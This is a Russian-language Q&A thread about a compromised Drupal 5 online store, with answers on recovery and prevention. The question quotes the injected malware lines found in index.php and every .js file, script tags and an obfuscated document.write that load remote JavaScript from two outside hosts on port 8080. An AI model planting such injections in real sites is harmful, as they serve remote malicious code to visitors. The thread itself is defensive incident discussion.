Речь идет об интернет-магазине на базе Drupal 5.
Внезапно он перестал работать. При входе на сайт появилась эта ошибка:
Ошибка синтаксического анализа: синтаксическая ошибка, неожиданный символ «<» в /home/public_html/index.php в строке 38
При дальнейшем рассмотрении я обнаружил следующие две строки в конце указанного index.php:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
После ручного удаления этих двух строк сайт снова заработал нормально.
Но после того, как было сообщено о других проблемах (с редактированием страниц), я обнаружил, что на самом деле все файлы *.js "заражены". Они все содержат дополнительную строку в конце:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
Этот сайт взломали? При поиске в Google "blog.nodisposable.com" ничего интересного не выдается. Сам сайт кажется легитимным. Вероятно, он сам взломан?
Может ли кто-нибудь объяснить, как это могло произойти? Что я могу сделать, чтобы обратить это вспять? И что я могу сделать, чтобы избежать этого в будущем?
Обновлять
После восстановления резервной копии сайта (не базы данных) проблема повторилась, но теперь тег скрипта указывал на dolfy.sedonahyperbarics.com:8080/XHTML.js.
По-видимому, также было создано много случайных учетных записей пользователей Drupal. Так что это может быть признаком того, что это была на самом деле уязвимость Drupal.
Мы удалили их и ограничили создание учетных записей пользователей только администраторами (так должно было быть с самого начала, я знаю :-s). Мы также изменили пароль пользователя admin на что-тоболее безопасный.
Будем надеяться, что теперь это не повторится.
решение1
Если его взломали, вы не знаете, был ли установлен черный ход.
Возможно, после переформатирования вам придется выполнить переустановку из заведомо исправной резервной копии.
Никогда не доверяйте системе, в которую проник злоумышленник.
Чтобы предотвратить это в будущем, вам придется следить за обновлениями и подписываться на списки, которые обновляются с учетом уязвимостей и лучших практик для программного обеспечения, которое вы используете (списки Drupal, списки безопасности вашей платформы и т. д.), а также блокировать службы только для пользователей, которые необходимы для использования системы, использовать безопасные пароли, не делать ничего в открытом тексте и все остальное в соответствии с лучшими практиками безопасности, которые выходят далеко за рамки контекста ответа здесь. И сохраняйте хорошие резервные копии и используйте обнаружение вторжений (например, систему типа Tripwire) для проверки активности злоумышленников.
решение2
Да, боюсь, вы заражены. «Как» — к сожалению, сказать невозможно без МНОГО дополнительных вложений времени и усилий. Это могла быть уязвимость в вашей установке Drupal (или в одном из ее модулей), это могла быть уязвимость в другом приложении на том же сервере, это мог быть слабый (или украденный) пароль FTP и т. д. Существует множество возможных точек входа.
решение3
Я видел что-то очень похожее (почти идентичное), но не имеющее отношения к Drupal, и это определенно был хак.
Как говорят другие, трудно узнать, не имея дополнительной информации о вашей среде. Быстрое решение, которое вы можете сделать, чтобы заблокировать его обслуживание, — это поместить директиву в ваш файл .htaccess, которая будет отклонять или перенаправлять любые запросы к этому файлу .js.
решение4
Хотя я основываюсь исключительно на собственном опыте, каждый подобный взлом, особенно с повторным заражением, был вызван тем, что кто-то с FTP-доступом к серверу заражал свою локальную машину и что-то крало учетные данные. Вам нужно проверить журналы FTP и убедиться, что вы распознаете все IP-адреса и обновления как действительные. Если что-то заражает повторно, вы должны это легко увидеть, если это так.